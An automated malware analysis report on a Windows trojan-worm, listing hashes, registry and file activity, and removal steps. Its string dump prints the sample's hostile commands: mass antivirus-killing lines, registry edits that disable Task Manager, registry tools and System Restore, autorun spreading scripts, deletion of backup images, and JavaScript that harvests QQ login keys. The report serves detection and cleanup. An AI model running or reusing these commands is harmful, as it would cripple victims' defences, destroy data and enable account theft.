HEUR:Trojan.Win32.Generic (Kaspersky), Generic.Malware.SFMDYBVd.380DE3A6 (B) (Emsisoft), Generic.Malware.SFMDYBVd.380DE3A6 (AdAware), Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericAutorunWorm.YR, GenericInjector.YR (Lavasoft MAS)Behaviour: Trojan, Worm, EmailWorm, WormAutorun, Malware
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: a823d3943c7ecc605d5e5a2346eec144
SHA1: eb47cadac6c5d8d7e773bb41c91363c90bb181bf
SHA256: c46c81403bc2643dd9cbad88c3bf9bf1e0b82adc1fe6db44df2131cd0a03dc49
SSDeep: 6144:nq9Eypeh23JV66dr1p VOWliICbpJouNjbb1FSEBqVg8OM0bzp45fW:q9N3JV6kr1cVOWdCLFfXf8gnp41W
Size: 304640 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: PackerUPXCompresorGratuitowwwupxsourceforgenet, UPolyXv05_v6
Company: no certificate found
Created at: 2013-08-20 20:07:35
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
Behaviour | Description |
---|---|
EmailWorm | Worm can send e-mails. |
WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer. |
Process activity
The Generic creates the following process(es):
net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644
The Generic injects its code into the following process(es):
%original file name%.exe:1756
Mutexes
The following mutexes were created/opened:
RasPbFileShimCacheMutex
File activity
The process %original file name%.exe:1756 makes changes in the file system.
The Generic creates and/or writes to the following file(s):
C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes)
Registry activity
The process %original file name%.exe:1756 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 16 E1 49 03 B3 D8 72 E9 4D AF FC EE 14 31 D0"
To automatically run itself each time Windows is booted, the Generic adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe"
The process net.exe:1364 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E F6 22 70 43 C0 C8 57 FE 6D 41 29 4E 51 1A F0"
The process net.exe:1772 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 69 8C 28 D6 E0 14 4D 51 9F 20 DE C2 2D 93 22"
The process net1.exe:1316 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0B 36 7D 30 6D 4A 0A 9E 92 98 50 4A EE 5B 12 7F"
The process net1.exe:644 makes changes in the system registry.
The Generic creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FA 78 7E 91 FB 80 78 06 E8 4F 84 B4 8E C5 03 C3"
Dropped PE files
There are no dropped PE files.
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Generic's file once a user opens a drive's folder in Windows Explorer.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
net.exe:1364
net.exe:1772
net1.exe:1316
net1.exe:644 - Delete the original Generic file.
- Delete or disinfect the following files created/modified by the Generic:
C:\slear.bat (50 bytes)
%System%\slear.exe (1425 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"slear.exe" = "c:\windows\system32\slear.exe" - Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: 2013????
Product Name: ??????
Product Version: 1.6.0.0
Legal Copyright: 2013???? ????
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 1.6.0.0
File Description: 2013
Comments: ??????????(http://www.eyuyan.com)
Language: Language Neutral
Company Name: 2013????Product Name: ??????Product Version: 1.6.0.0Legal Copyright: 2013???? ????Legal Trademarks: Original Filename: Internal Name: File Version: 1.6.0.0File Description: 2013Comments: ??????????(http://www.eyuyan.com)Language: Language Neutral
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
UPX0 | 4096 | 651264 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
UPX1 | 655360 | 290816 | 287232 | 5.49401 | d3b9f527d2e9a1552783d2289ad5c0b8 |
.rsrc | 946176 | 16384 | 16384 | 2.49987 | e2784112b04c223b0d25494fb365f9a9 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Total found: 2
caf03e9cc3118627cd7c3d133a311224
0a9ae60a1507dc9b0141dcb01ee413f6
Network Activity
URLs
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
Map
The Generic connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_1756:
`.rsrc
`.rsrc
t$(SSh
t$(SSh
~%UVW
~%UVW
u$SShe
u$SShe
atl.dll
atl.dll
wininet.dll
wininet.dll
kernel32.dll
kernel32.dll
advapi32.dll
advapi32.dll
NTDLL.DLL
NTDLL.DLL
HttpOpenRequestA
HttpOpenRequestA
HttpSendRequestA
HttpSendRequestA
HttpQueryInfoA
HttpQueryInfoA
sleartest.exe
sleartest.exe
dll.bat
dll.bat
\*.dll
\*.dll
exe.bat
exe.bat
\*.exe
\*.exe
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&keyindex=9&pt_aid=549000912&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
&clientkey=
&clientkey=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://ptlogin2.qq.com/jump?clientuin=
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
hXXp://qzs.qq.com/qzone/v5/loginsucc.html?para=izone
skey=
skey=
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
#home&syn_tweet_verson=1&richtype=&richval=&special_url=&subrichtype=&who=1&con=qm
qzreferrer=http://user.qzone.qq.com/
qzreferrer=http://user.qzone.qq.com/
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
hXXp://taotao.qq.com/cgi-bin/emotion_cgi_publish_v6?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=base&nickname=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
qzreferrer=http://cnc.qzs.qq.com/qzone/v6/setting/profile/profile.html?tab=space&spacename=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
hXXp://w.cnc.qzone.qq.com/cgi-bin/user/cgi_apply_updateuserinfo_new?g_tk=
SSOAxCtrlForPTLogin.SSOForPTLogin2
SSOAxCtrlForPTLogin.SSOForPTLogin2
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin
document.body.innerHTML=GetuinKey();
document.body.innerHTML=GetuinKey();
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
http=
http=
https
https
HTTP/1.1
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
HTTP/1.1
HTTP/1.1
hXXp://
hXXp://
len = str.length; i
len = str.length; i
var t = QZONE.FormSender;
var t = QZONE.FormSender;
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
if (t && t.pluginsPool) t.pluginsPool.formHandler.push(function(fm) {
var a = QZFL.string.trim(fm.action);
var a = QZFL.string.trim(fm.action);
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
a = (a.indexOf("?") > -1 ? "&": "?") "g_tk=" QZFL.pluginsDefine.getACSRFToken();
fm.action = a
fm.action = a
slear && del / f / s / q c:\slear.bat
slear && del / f / s / q c:\slear.bat
c:\slear.bat
c:\slear.bat
cmd.exe
cmd.exe
c:\windows\system\shutdown.bat
c:\windows\system\shutdown.bat
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\slear.exe
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "reboot_system" /t REG_SZ /d "shutdown -s -t 0"
del :\forshotdown.cmd
del :\forshotdown.cmd
shutdown -s -t 0 && del / f / s / q c:\slear.bat
shutdown -s -t 0 && del / f / s / q c:\slear.bat
c:\windows\system32\slear.exe
c:\windows\system32\slear.exe
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr
hXXp://VVV.shafou.com
hXXp://VVV.shafou.com
copy %0 %windir%\system32\cmd.bat
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat r s h
attrib %windir%\system32\cmd.bat r s h
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
%s% /im 360safe.exe /f >nul
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /t
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
for %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nul
echo @echo off >d:\setup.bat
echo @echo off >d:\setup.bat
!^.^ >>d:\setup.bat
!^.^ >>d:\setup.bat
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
echo copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\
\a.bat >>d:\setup.bat
\a.bat >>d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
/f >>d:\setup.bat
/f >>d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
HKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f >>d:\setup.bat
echo [windows] >> %windir%\win.ini
echo [windows] >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.ini
echo [boot] >> %windir%\system.ini
echo [boot] >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.ini
echo [AutoRun] >d:\autorun.inf
echo [AutoRun] >d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=setup.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
echo Open=system.bat >>d:\autorun.inf
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\autorun.inf r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
attrib d:\setup.bat r s h >>d:\setup.bat
start d:\setup.bat /min >nul
start d:\setup.bat /min >nul
echo @echo off >>C:\AUTOEXEC.BAT
echo @echo off >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
C:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BAT
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /d
/f >>C:\AUTOEXEC.BAT
/f >>C:\AUTOEXEC.BAT
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
echo if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BAT
copy %0 %systemroot%\windows.bat >nul
copy %0 %systemroot%\windows.bat >nul
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
if not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
C:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat/f >>%windir%/system32/explorer.bat
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
echo REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
windir%/system32/explorer.bat /f >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
echo start %systemroot%\windows.bat /min >>%windir%/system32/explorer.bat
attrib %windir%/system32/explorer.bat r s h%
attrib %windir%/system32/explorer.bat r s h%
attrib %systemroot%/windows.bat r s h
attrib %systemroot%/windows.bat r s h
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo @echo off >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%alldrive%) do echo attrib system.bat r s h >>%%c:\system.bat
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
for %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.inf
copy %0 d:\Program" "Files\run.bat
copy %0 d:\Program" "Files\run.bat
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
for %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min
>>%%c:\system.bat
>>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib autorun.inf r s h >>%%c:\system.bat
for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
for %%c in (%alldrive%) do attrib %%c:\autorun.inf r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
for %%c in (%alldrive%) do attrib %%c:\system.bat r s h >nul
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
if not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat /min >>d:\setup.bat
attrib d:\Program" "Files\run.bat r s h >nul
attrib d:\Program" "Files\run.bat r s h >nul
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
hXXp://VVV.hackbase.com/subject/2009-09-21/16408.htmlc:\kill.bat
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind
SOFTWARE\360Safe\safemon\ExecAccess
SOFTWARE\360Safe\safemon\ExecAccess
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Policies\Microsoft\Windows\System\DisableCMD
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\
SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\
